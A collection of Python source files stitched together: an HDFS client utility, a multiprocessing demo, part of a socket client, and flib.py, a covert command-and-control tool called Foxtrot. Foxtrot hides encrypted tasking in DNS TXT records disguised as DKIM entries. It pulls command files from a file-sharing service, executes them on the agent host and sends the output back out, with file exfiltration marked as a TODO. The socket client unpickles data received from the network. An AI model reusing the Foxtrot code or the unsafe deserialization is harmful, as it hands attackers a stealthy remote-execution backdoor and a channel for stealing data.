ret_code, ret_out, ret_err = proc.returncode, output, errors
if ret_code:
_logger.warn(
'Times: %d, Error running command: %s. Return code: %d, Error: %s'
% (x, ' '.join(whole_commands), proc.returncode, errors))
else:
break
return ret_code, ret_out, ret_err
def upload(self, hdfs_path, local_path, overwrite=False, retry_times=5):
"""
upload the local file to hdfs
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
retry_times(int|5): retry times
Returns:
True or False
"""
assert hdfs_path is not None
assert local_path is not None and os.path.exists(local_path)
if os.path.isdir(local_path):
_logger.warn(
"The Local path: {} is dir and I will support it later, return".
format(local_path))
return False
base = os.path.basename(local_path)
if not self.is_exist(hdfs_path):
self.makedirs(hdfs_path)
else:
if self.is_exist(os.path.join(hdfs_path, base)):
if overwrite:
_logger.error(
"The HDFS path: {} is exist and overwrite is True, delete it".
format(hdfs_path))
self.delete(hdfs_path)
else:
_logger.error(
"The HDFS path: {} is exist and overwrite is False, return".
format(hdfs_path))
return False
put_commands = ["-put", local_path, hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(put_commands,
retry_times)
if returncode:
_logger.error("Put local path: {} to HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Put local path: {} to HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def download(self, hdfs_path, local_path, overwrite=False, unzip=False):
"""
download file from HDFS
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
unzip(bool|False): if the download file is compressed by zip, unzip it or not.
Returns:
True or False
"""
_logger.info('Downloading %r to %r.', hdfs_path, local_path)
_logger.info('Download of %s to %r complete.', hdfs_path, local_path)
if not self.is_exist(hdfs_path):
print("HDFS path: {} do not exist".format(hdfs_path))
return False
if self.is_dir(hdfs_path):
_logger.error(
"The HDFS path: {} is dir and I will support it later, return".
format(hdfs_path))
if os.path.exists(local_path):
base = os.path.basename(hdfs_path)
local_file = os.path.join(local_path, base)
if os.path.exists(local_file):
if overwrite:
os.remove(local_file)
else:
_logger.error(
"The Local path: {} is exist and overwrite is False, return".
format(local_file))
return False
self.make_local_dirs(local_path)
download_commands = ["-get", hdfs_path, local_path]
returncode, output, errors = self.__run_hdfs_cmd(download_commands)
if returncode:
_logger.error("Get local path: {} from HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Get local path: {} from HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def is_exist(self, hdfs_path=None):
"""
whether the remote HDFS path exists
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
exist_cmd = ['-test', '-e', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
exist_cmd, retry_times=1)
if returncode:
_logger.error("HDFS is_exist HDFS path: {} failed".format(
hdfs_path))
return False
else:
_logger.info("HDFS is_exist HDFS path: {} successfully".format(
hdfs_path))
return True
def is_dir(self, hdfs_path=None):
"""
whether the remote HDFS path is directory
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
if not self.is_exist(hdfs_path):
return False
dir_cmd = ['-test', '-d', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(dir_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path: {} failed is not a directory".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} successfully is a directory".format(
hdfs_path))
return True
def delete(self, hdfs_path):
"""
Remove a file or directory from HDFS.
whether the remote HDFS path exists
Args:
hdfs_path: HDFS path.
Returns:
True or False
This function returns `True` if the deletion was successful and `False` if
no file or directory previously existed at `hdfs_path`.
"""
_logger.info('Deleting %r.', hdfs_path)
if not self.is_exist(hdfs_path):
_logger.warn("HDFS path: {} do not exist".format(hdfs_path))
return True
if self.is_dir(hdfs_path):
del_cmd = ['-rmr', hdfs_path]
else:
del_cmd = ['-rm', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(del_cmd, retry_times=0)
if returncode:
_logger.error("HDFS path: {} delete files failure".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} delete files successfully".format(
hdfs_path))
return True
def rename(self, hdfs_src_path, hdfs_dst_path, overwrite=False):
"""
Move a file or folder on HDFS.
Args:
hdfs_path(str): HDFS path.
overwrite(bool|False): If the path already exists and overwrite is False, will return False.
Returns:
True or False
"""
assert hdfs_src_path is not None
assert hdfs_dst_path is not None
if not self.is_exist(hdfs_src_path):
_logger.info("HDFS path do not exist: {}".format(hdfs_src_path))
if self.is_exist(hdfs_dst_path) and not overwrite:
_logger.error("HDFS path is exist: {} and overwrite=False".format(
hdfs_dst_path))
rename_command = ['-mv', hdfs_src_path, hdfs_dst_path]
returncode, output, errors = self.__run_hdfs_cmd(
rename_command, retry_times=1)
if returncode:
_logger.error("HDFS rename path: {} to {} failed".format(
hdfs_src_path, hdfs_dst_path))
return False
else:
_logger.info("HDFS rename path: {} to {} successfully".format(
hdfs_src_path, hdfs_dst_path))
return True
@staticmethod
def make_local_dirs(local_path):
"""
create a directiory local, is same to mkdir
Args:
local_path: local path that wants to create a directiory.
"""
try:
os.makedirs(local_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def makedirs(self, hdfs_path):
"""
Create a remote directory, recursively if necessary.
Args:
hdfs_path(str): Remote path. Intermediate directories will be created appropriately.
Returns:
True or False
"""
_logger.info('Creating directories to %r.', hdfs_path)
assert hdfs_path is not None
if self.is_exist(hdfs_path):
_logger.error("HDFS path is exist: {}".format(hdfs_path))
return
mkdirs_commands = ['-mkdir', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
mkdirs_commands, retry_times=1)
if returncode:
_logger.error("HDFS mkdir path: {} failed".format(hdfs_path))
return False
else:
_logger.error("HDFS mkdir path: {} successfully".format(hdfs_path))
return True
def ls(self, hdfs_path):
"""
ls directory contents about HDFS hdfs_path
Args:
hdfs_path(str): Remote HDFS path will be ls.
Returns:
List: a contents list about hdfs_path.
"""
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-ls', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list path: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list path: {} successfully".format(hdfs_path))
ret_lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
ret_lines.append(re_line[7])
return ret_lines
def lsr(self, hdfs_path, only_file=True, sort=True):
"""
list directory contents about HDFS hdfs_path recursively
Args:
hdfs_path(str): Remote HDFS path.
only_file(bool|True): will discard folders.
sort(bool|True): will be sorted by create time.
Returns:
List: a contents list about hdfs_path.
"""
def sort_by_time(v1, v2):
v1_time = datetime.strptime(v1[1], '%Y-%m-%d %H:%M')
v2_time = datetime.strptime(v2[1], '%Y-%m-%d %H:%M')
return v1_time > v2_time
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-lsr', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list all files: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list all files: {} successfully".format(
hdfs_path))
lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
if only_file and re_line[0][0] == "d":
continue
else:
lines.append(
(re_line[7], re_line[5] + " " + re_line[6]))
if sort:
sorted(lines, cmp=sort_by_time)
ret_lines = [ret[0] for ret in lines]
return ret_lines
def multi_download(client,
hdfs_path,
local_path,
trainer_id,
trainers,
multi_processes=5):
"""
Download files from HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
trainer_id(int): current trainer id
trainers(int): all trainers number
multi_processes(int|5): the download data process at the same time, default=5
Returns:
List:
Download files in local folder.
"""
def __subprocess_download(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
sub_local_re_path = local_path
else:
sub_local_re_path = os.path.join(local_path, re_path)
client.download(data, sub_local_re_path)
assert isinstance(client, HDFSClient)
client.make_local_dirs(local_path)
_logger.info("Make local dir {} successfully".format(local_path))
all_need_download = client.lsr(hdfs_path, sort=True)
need_download = all_need_download[trainer_id::trainers]
_logger.info("Get {} files From all {} files need to be download from {}".
format(len(need_download), len(all_need_download), hdfs_path))
_logger.info("Start {} multi process to download datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = need_download[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_download, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to download datas".format(
multi_processes))
local_downloads = []
for data in need_download:
data_name = os.path.basename(data)
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
local_re_path = os.path.join(local_path, data_name)
else:
local_re_path = os.path.join(local_path, re_path, data_name)
local_downloads.append(local_re_path)
return local_downloads
def getfilelist(path):
rlist = []
for dir, folder, file in os.walk(path):
for i in file:
t = os.path.join(dir, i)
rlist.append(t)
for r in rlist:
print(r)
def multi_upload(client,
hdfs_path,
local_path,
multi_processes=5,
overwrite=False,
sync=True):
"""
Upload files to HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
multi_processes(int|5): the upload data process at the same time, default=5
overwrite(bool|False): will overwrite file on HDFS or not
sync(bool|True): upload files sync or not.
Returns:
None
"""
def __subprocess_upload(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), local_path)
hdfs_re_path = os.path.join(hdfs_path, re_path)
client.upload(hdfs_re_path, data, overwrite, retry_times=5)
def get_local_files(path):
rlist = []
if not os.path.isdir(path):
return rlist
for dirname, folder, files in os.walk(path):
for i in files:
t = os.path.join(dirname, i)
rlist.append(t)
return rlist
assert isinstance(client, HDFSClient)
all_files = get_local_files(local_path)
if not all_files:
_logger.info("there are nothing need to upload, exit")
return
_logger.info("Start {} multi process to upload datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = all_files[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_upload, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to upload datas".format(
multi_processes))
if __name__ == "__main__":
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
downloads = multi_download(
client,
"/user/com/train-25/model",
"/home/xx/data1",
1,
5,
100,
multi_processes=5)
multi_upload(client, "/user/com/train-25/model", "/home/xx/data1")
|
multiprocessing_interprocess_communication_IPC.py
|
import time
import multiprocessing
result = []
def calc_square(numbers):
print('Calculating squares:')
for n in numbers:
print('square of {}: {}'.format(n, n * n))
result.append(n * n)
print('result within process: {}'.format(result))
if __name__ == '__main__':
arr = [2, 3, 8, 9]
start = time.time()
p1 = multiprocessing.Process(target=calc_square, args=(arr, ))
p1.start()
p1.join()
end = time.time()
print('result outside of process: {}'.format(result))
print('done in {} ms.'.format(str((end - start) * 1000)))
|
flib.py
|
from os import rename, path
from io import BytesIO
from random import randint
from time import sleep
import json
import tempfile
import os
import threading
from foxtrot.fconcmd import FConCommander
# DNS Resolver
import dns.resolver
import dns.update
import dns.query
import dns.tsigkeyring
from dns.tsig import HMAC_SHA256
# Crypto / encoding
from Cryptodome.Cipher import AES
from base64 import urlsafe_b64encode, urlsafe_b64decode
# FF Send-cli
# special thanks to https://github.com/ehuggett/send-cli
import sendclient.common
import sendclient.download
import sendclient.upload
# OS exec
# git clone https://github.com/kennethreitz/delegator.py ; python setup.py install
import delegator
class Foxtrot:
def __init__(self, config, logger):
self.flogger = logger
self.fconfig = config
# Set DNS Resolver this is important so we query the nsserver directly,
# and not caching servers default on the OS.
# Otherwise propagation and TTLs may be in the way and give mixed results
# when trying to update/add/delete records
dns.resolver.default_resolver = dns.resolver.Resolver(configure=False)
dns.resolver.default_resolver.nameservers = [self.fconfig['nssrv']]
def fx_agent_dynrec(self, operation, domain, nssrv, selector, ttl, payload_b64, **tsig):
""" Manage Agent Dynamic DNS Record: CRUD"""
self.flogger.debug("Accepted for record: {0}, {1}, {2}, {3}, {4}, {5}, {6}".format(
operation, domain, nssrv, selector, ttl, payload_b64, tsig))
keyring = dns.tsigkeyring.from_text(tsig)
self.flogger.debug("DNS TSIG Keyring: " + str(keyring))
update = dns.update.Update(domain, keyring=keyring, keyalgorithm=HMAC_SHA256)
self.flogger.debug("DNS TXT Update: " + str(update))
# Make DKIM record look normal
dkim_record = '"v=DKIM1; h=sha256; k=rsa; t=y; s=email; p={0}"'.format(payload_b64)
# From http://www.dnspython.org/docs/1.14.0/dns.update.Update-class.html#add
if operation == 'add':
self.flogger.debug("DNS: Adding TXT record")
update.add(selector, ttl, dns.rdatatype.TXT, dkim_record)
else:
if operation == 'update':
self.flogger.debug("DNS: Updating TXT record")
update.replace(selector, ttl, dns.rdatatype.TXT, dkim_record)
else:
if operation == 'delete':
self.flogger.debug("DNS: Deleting TXT record")
update.delete(selector)
else:
self.flogger.error("DNS: Invalid record action: " + operation)
raise ValueError("Operation must be one of <add|update|delete>")
try:
response = dns.query.tcp(update, nssrv, timeout=10)
if response.rcode() == 0:
self.flogger.debug("DynDNS: Update Successful")
return True
else:
self.flogger.error("DynDNS: Update failed: code: {0}".format(response.rcode()))
self.flogger.error("Response: {0}".format(response))
return False
except dns.tsig.PeerBadKey as peerkey:
self.flogger.error("DNS TSIG: Bad Peer key {0}".format(peerkey))
return False
except Exception as e:
self.flogger.error("DNS: General Exception {0}".format(e))
return False
# After you add/update the record you can query the NS:
# Ex: dig @ns1.domain txt selector._domainkey.domain
# If you omit the @ns then DNS routing rules to get to
# your DNS via default resolver cache will apply
def fx_agent_ident(self, key, domain):
""" Return Agent identification """
return ".".join([key, "_domainkey", domain])
def fx_check_agent(self, key, domain):
""" Find and return DKIM selector for an agent if exists """
fqdnselector = self.fx_agent_ident(key, domain)
answer = None
try:
answers = dns.resolver.query(fqdnselector, 'TXT')
if len(answers) != 1:
answer = answers[0]
else:
answer = answers
self.flogger.debug("DNS Agent via record: {0}, TTL: {1}".format(
answer.qname, answer.rrset.ttl))
except dns.resolver.NXDOMAIN as nxdome:
self.flogger.debug("DNS Resolver exception: {0}".format(nxdome))
return answer
return answer
def fx_check_payload(self, key, domain):
"""Return DKIM payload verbatim for inspection """
data = ""
answer = self.fx_check_agent(key, domain)
if answer is not None:
for rdata in answer:
for txt in rdata.strings:
data = txt
return data
def fx_get_payload(self, key, domain):
""" Get Instruction from DNS Store"""
data = self.fx_check_payload(key, domain)
# Check data for validity
self.flogger.debug("DNS Record Content: {0} ".format(data))
dkim_rec = str(data).split(";")
payload_holder = dkim_rec[-1].strip()
self.flogger.debug("DNS Payload holder: " + payload_holder)
payload_b64 = payload_holder.split("p=")[-1]
self.flogger.debug("DNS Payload (B64 data): " + payload_b64)
recv_data = self.fx_pdec(key, payload_b64)
self.flogger.debug("Payload (decrypted data): " + recv_data)
return recv_data
def fx_penc(self, key, data):
""" Encrypt data w/key """
cipher = AES.new(key.encode(), AES.MODE_EAX)
ciphertext, tag = cipher.encrypt_and_digest(data.encode())
self.flogger.debug("ENC: Ciphertext type: {0}".format(type(ciphertext)))
self.flogger.debug("ENC: Ciphertext: {0}".format(str(ciphertext)))
# Use common format cross platform
ciphertext_b64 = urlsafe_b64encode(ciphertext)
self.flogger.debug("ENC: Ciphertext(b64): {0}".format(ciphertext_b64) )
self.flogger.debug("ENC: Nonce type: {0}".format(type(cipher.nonce)))
self.flogger.debug("ENC: Nonce: {0}".format(str(cipher.nonce)))
nonce_b64 = urlsafe_b64encode(cipher.nonce)
self.flogger.debug("ENC: Nonce(b64): {0}".format(nonce_b64))
self.flogger.debug("ENC: Tag type: {0}".format(type(tag)))
self.flogger.debug("ENC: Tag: {0}".format( str(tag)))
tag_b64 = urlsafe_b64encode(tag)
self.flogger.debug("ENC: Tag (B64) : {0}".format(tag_b64))
payload = b''.join([cipher.nonce, tag, ciphertext])
payload_b64 = urlsafe_b64encode(payload)
payload_b64_ascii = payload_b64.decode('ascii')
self.flogger.debug("ENC: Record payload (ASCII) : {0}".format(payload_b64_ascii))
return payload_b64_ascii
def fx_pdec(self, key, payload_b64_ascii):
""" Decrypt encoded and encrypted payload w/key """
payload = urlsafe_b64decode(payload_b64_ascii)
payload_stream = BytesIO(payload)
nonce, tag, ciphertext = [payload_stream.read(x) for x in (16, 16, -1)]
self.flogger.debug("DEC: Nonce type: {0}".format(type(nonce)))
self.flogger.debug("DEC: Nonce: {0}".format(str(nonce)))
cipher = AES.new(key.encode(), AES.MODE_EAX, nonce)
data = cipher.decrypt_and_verify(ciphertext, tag)
# This is dependent on how it was encoded by the origin
originaldata = data.decode('ascii')
return originaldata
def fx_selector_from_key(self, key, domain, fqdn=False):
""" Build DKIM selector from key"""
if not fqdn:
selector = ".".join([key, "_domainkey"])
else:
selector = ".".join([key, "_domainkey", domain])
return selector
def fx_send_file(self, service, sfile):
""" Send file the send service via sendlclient """
self.flogger.debug('SF: Uploading "' + sfile.name + '"')
# Ignore potentially incompatible version of server. Turn `ignoreVersion to True` to care
ffsend_link, fileId, delete_token = sendclient.upload.send_file(
service, sfile, ignoreVersion=True, fileName=None)
self.flogger.debug('SF: File Uploaded, use the following link to retrieve it')
self.flogger.debug("SF: Link: {0}, FileId: {1}, Delete file with key: {2}".format(
ffsend_link,fileId, delete_token))
self.flogger.debug(ffsend_link)
return ffsend_link
def fx_url_to_file(self, url, dfile=None, temp=False):
""" Get URL from the send service via sendlclient """
# Ignore potentially incompatible version of server. Turn `ignoreVersion to True` to care
tmpfile, suggested_name = sendclient.download.send_urlToFile(url, ignoreVersion=True)
print("Suggested name: ", suggested_name)
self.flogger.debug('SF: Downloaded {0} -> {1}'.format(url, tmpfile.name))
if dfile is not None:
self.flogger.debug("SF: Renaming and Saving {0} -> {1}".format(tmpfile.name, dfile.name))
rename(tmpfile.name, dfile.name)
return path.abspath(dfile.name)
else:
if not temp:
self.flogger.debug("SF: Renaming and Saving {0} -> {1}".format(tmpfile.name, suggested_name))
try:
rename(tmpfile.name, suggested_name)
return path.abspath(suggested_name)
except OSError as ose:
print("Unable to save file {} : \nLeaving it under `unknown` ".format(
suggested_name, ose))
suggested_name = "unknown"
rename(tmpfile.name, suggested_name)
return path.abspath(suggested_name)
else:
fd, tf = tempfile.mkstemp()
rename(tmpfile.name, tf)
return path.abspath(tf)
def agent_peek(self):
""" Peek: See unwrapped and decrypted payload """
if hasattr(self.fconfig['args'], 'interval_low') and \
hasattr(self.fconfig['args'], 'interval_high') and \
(self.fconfig['args'].interval_low > 0 or self.fconfig['args'].interval_high > 0):
while True:
data = self.fx_get_payload(self.fconfig['key'], self.fconfig['domain'])
self.flogger.info(data)
sleep(randint(self.fconfig['args'].interval_low,
self.fconfig['args'].interval_high))
elif 'peek_watch' in self.fconfig:
while True:
data = self.fx_get_payload(self.fconfig['key'], self.fconfig['domain'])
self.flogger.info(data)
sleep(int(self.fconfig['watch']))
else:
data = self.fx_get_payload(self.fconfig['key'], self.fconfig['domain'])
return data
def agent_ident(self):
""" Ident: Identify agent in DNS """
data = "Agent: ID:{0} >> RR:{1} @{2} ".format(
self.fconfig['agent'].decode(),
self.fx_agent_ident(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['nssrv'] )
return data
def agent_show(self):
""" Show: Show DNS record value (wrapped and encrypted payload) """
data = self.fx_check_payload(self.fconfig['key'], self.fconfig['domain'])
return data
def agent_check(self):
"""Check if agent record exists, and if not - notify and bail"""
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is None:
self.flogger.warning("FX: Agent {0} not known to the system (key: {1})".format(
self.fconfig['agent'].decode(), self.fconfig['key']))
self.flogger.warning("FX: Invoke `agent` action with `--operation generate` option")
def agent_reset(self):
msgMeta = {'t': 's', 's': 'W', 'c': '', 'u': ''}
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is not None:
jmsgMeta = json.dumps(msgMeta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmsgMeta)
self.fx_agent_dynrec("update", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
else:
self.flogger.warning("FX: Agent record {0} does not exist. Create it first".format(
self.fconfig['agent'].decode()))
def agent_generate(self):
"""Check if agent record exists, and if not - generate one"""
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is not None:
self.flogger.error("FX: Agent record already exists. Delete it first")
self.flogger.error("FX: Agent record is: {0} >> {1} @{2} ".format(
self.fconfig['agent'].decode(),
self.fx_agent_ident(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['nssrv'],
))
else:
self.flogger.warning("FX: New Agent record {0} will be GENERATED.".format(
self.fconfig['agent'].decode()))
msgMeta = {'t': 's', 's': 'W', 'c': '', 'u': ''}
jmsgMeta = json.dumps(msgMeta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmsgMeta)
self.fx_agent_dynrec("add", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
def agent_delete(self):
"""Delete agent record"""
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is not None:
self.flogger.warning("FX: Agent record {0} will be DELETED ".format(
self.fconfig['agent'].decode()))
self.flogger.warning("FX: Agent: {0} >> {1} @{2} ".format(
self.fconfig['agent'].decode(),
self.fx_agent_ident(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['nssrv'],
))
payload_b64 = self.fx_penc(self.fconfig['key'], "Not important, deleted")
self.fx_agent_dynrec("delete", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
else:
self.flogger.error("FX: Agent record does not exist.")
def _action_recv_master(self, agent_job):
# Process instruction metadata
# Process type response
if agent_job["t"].lower() == "s":
self.flogger.debug("Response received.")
# Fetch instructions from FFSend url
job_url = agent_job['u']
self.flogger.debug("Job Response Content URL: {0}".format(job_url))
# no URL posted from agent
if job_url == "":
return
fpath = self.fx_url_to_file(job_url, temp=True)
self.flogger.debug("Find downloaded response file in: " + fpath)
# Determine how to process downloaded file
# 'o' - output from command: cat to stdout
if agent_job["c"].lower() == "o":
with open(fpath, mode="rb") as cf:
print(cf.read().decode('utf-8'))
os.remove(fpath)
# TODO: Notify agent of a pickup by master
self.agent_reset()
elif agent_job["t"].lower() == "q":
self.flogger.debug("Request received. But your Role is Master.")
else:
self.flogger.error("Invalid Instruction: Not a request | response type")
def _action_recv_slave(self, agent_job):
# Process instruction metadata
# Process type request
if agent_job["t"].lower() == "q":
self.flogger.debug("Request received")
# Fetch instructions from FFSend url
job_url = agent_job['u']
self.flogger.debug("Job URL: {0}".format(type(job_url)))
if job_url is None:
return
# TODO: Implement data file download
if agent_job["c"].lower() == "f":
self.flogger.debug("Request received: data file download")
fpath = self.fx_url_to_file(job_url)
self.flogger.debug("Data file fetched: {}".format(fpath))
# Update DNS record meta only. Download of content only, no output
self.action_send_response("AWAIT", 'o', None, True)
if agent_job["c"].lower() == "o":
self.flogger.debug("Request received: external command exec()")
# Update DNS record meta only. Processing
self.flogger.debug("Setting ABUSY flag in record")
self.action_send_response("ABUSY", 'o', None, True)
fpath = self.fx_url_to_file(job_url, temp=True)
self.flogger.debug("Reading from: {}".format(fpath))
with open(fpath, mode="rb") as cf:
instructions = cf.read().decode('utf-8')
os.remove(fpath)
self.flogger.info("\n==> Request: ({}) <==".format(instructions))
self.flogger.debug("Instructions requested: \n{0}".format(instructions))
# Run command(s) from file
c = delegator.chain(instructions)
cout = c.out
output = "\n".encode('ascii') + cout.encode('ascii', 'replace')
# Update DNS record with results
print("<== Response posted ==>\n")
self.action_send_response("AWAIT", 'o', output)
# TODO: Implement internal agent commands
if agent_job["c"].lower() == "m":
self.flogger.debug("Request received: internal command")
self.flogger.error("NOT IMPLEMENTED")
elif agent_job["t"].lower() == "s":
self.flogger.debug("Response received. But your Role is Slave.")
else:
self.flogger.error("Invalid Instruction: Not a request | response type")
def action_recv(self):
"""
1. Receive data from DNS Store.
2. Follow processing instructions.
3. Update DNS Store record with response
"""
# Receive instruction data
recv_data = self.agent_peek()
self.flogger.debug("FX: Received Unwrapped data: {0}".format(recv_data))
agent_job = json.loads(recv_data)
self.flogger.debug("Agent job: {0}".format(agent_job))
if self.fconfig['verbose'] == 'debug':
for k, v in agent_job.items():
self.flogger.debug("{0} : {1}".format(k, v))
# process as slave
if self.fconfig['role'] == 'slave':
# Agent will only process jobs in SJOB(J) state
if agent_job["s"].upper() != "J":
self.flogger.info("No Job posted for agent")
self.flogger.debug("Record Data: {}".format(recv_data))
return
self._action_recv_slave(agent_job)
# process as master
if self.fconfig['role'] == 'master':
# Agent will only process jobs not in ABUSY(B) or AWAIT(W) states
if agent_job["s"].upper() != "W":
self.flogger.info("Agent is busy or pending job pick up.")
self.flogger.debug("Record Data: {}".format(recv_data))
return
self._action_recv_master(agent_job)
def action_send_response(self, jobstate, response_type, dmsgcontent=None, metaonly=False):
""" Send response to Store"""
ffsend_link = ""
msgMeta=None
# set state to AWAIT (free) or ABUSY (processing)
if jobstate == "AWAIT":
msgMeta = {'t': 's', 's': 'W', 'c': '', 'u': ''}
if jobstate == "ABUSY":
msgMeta = {'t': 's', 's': 'B', 'c': '', 'u': ''}
# TODO: Implement file exfil
if response_type == 'o': # output command
msgMeta['c'] = 'o'
if not metaonly:
if dmsgcontent is not None:
with tempfile.NamedTemporaryFile() as tf:
tf.write(dmsgcontent)
tf.seek(0)
ffsend_link = self.fx_send_file(self.fconfig['service'], tf)
self.flogger.debug("Serve: Retrieve response at: " + ffsend_link)
msgMeta['u'] = ffsend_link
# package metadata
jmsgMeta = json.dumps(msgMeta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmsgMeta)
self.fx_agent_dynrec("update", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
def action_send_file(self, dfh, meta):
""" Send file to Frefox Send service"""
ffsend_link = ""
ffsend_link = self.fx_send_file(self.fconfig['service'], dfh)
self.flogger.debug("Retrieve with: " + ffsend_link)
meta['u'] = ffsend_link
jmeta = json.dumps(meta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmeta)
self.fx_agent_dynrec("update", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
def action_send_cmd(self, meta, content):
""" Convert command to file"""
with tempfile.NamedTemporaryFile() as tf:
tf.write(content)
tf.seek(0)
self.action_send_file(tf, meta)
def action_send_data_file(self, dfh):
""" Send data file to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'f', 'u': ''}
self.action_send_file(dfh, msgMeta)
def action_send_ocmd_file(self, dfh):
"""" Send file wth command for execution to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'o', 'u': ''}
self.action_send_file(dfh, msgMeta)
def action_send_ocmd(self, dmsgcontent):
""" Send <external> command for execution to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'o', 'u': ''}
self.action_send_cmd(msgMeta, dmsgcontent)
def action_send_mcmd(self, dmsgcontent):
""" Send <internal> command for execution to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'm', 'u': ''}
self.action_send_cmd(msgMeta, dmsgcontent)
def action_console(self):
""" Enter console """
print('Starting Command server, use <Ctrl-D> , `q`, `quit` to quit')
cst = threading.Thread(target=self.cmdservice_worker, args=(self.fconfig, self))
cst.start()
def cmdservice_worker(self, fconfig, fox):
fcc = FConCommander(fconfig, fox)
fcc.do_loop()
def fpath2fh(self, fpath):
if os.path.exists(fpath) and os.path.isfile(fpath):
try:
fh = open(fpath, 'rb')
except IOError as ioe:
self.flogger.error("File {} could not be opened: {}".format(fpath, ioe ))
print("File {} could not be opened: {}".format(fpath, ioe ))
return None
return fh
else:
self.flogger.error("Path {} does not exist".format(fpath))
print("Path {} does not exist".format(fpath))
return None
|
connection.py
|
import crypttools as crypt
import socket
import threading
import pickle
import handle
import time
class ErrorDisconnectedFromServer(Exception):
pass
class ErrorReceivingMessage(Exception):
pass
class ErrorSendingMessage(Exception):
pass
class ErrorMessageNotFromServer(Exception):
pass
class ErrorConnectingToServer(Exception):
pass
__HEADER_SIZE__ = 4
__HEADER_AMOUNT__ = 4
class Client:
def __init__(self, ip, port, onReceive=lambda x: None):
self.ip = ip
self.port = port
self.uid = crypt.strHash(str(self.ip) + '$@lt' + str(self.port))
self.connected = False
self.connection = None
self.onReceive = onReceive
self.timeLast = time.time()
def _dict_wrapper(self, data, type_='data'):
return {
'uid': self.uid,
'time': time.time(),
'payload': data,
'type': type_
}
def _receive_once(self):
try:
received = self.connection.recv(__HEADER_SIZE__)
received = int(received)
#print("Client got data amount:", received)
if received == b'':
return
received = int(received)
mes = None
try:
data = self.connection.recv(received)
mes = pickle.loads(data)
mes = handle.Message(mes)
except Exception as e:
print("Error:", e)
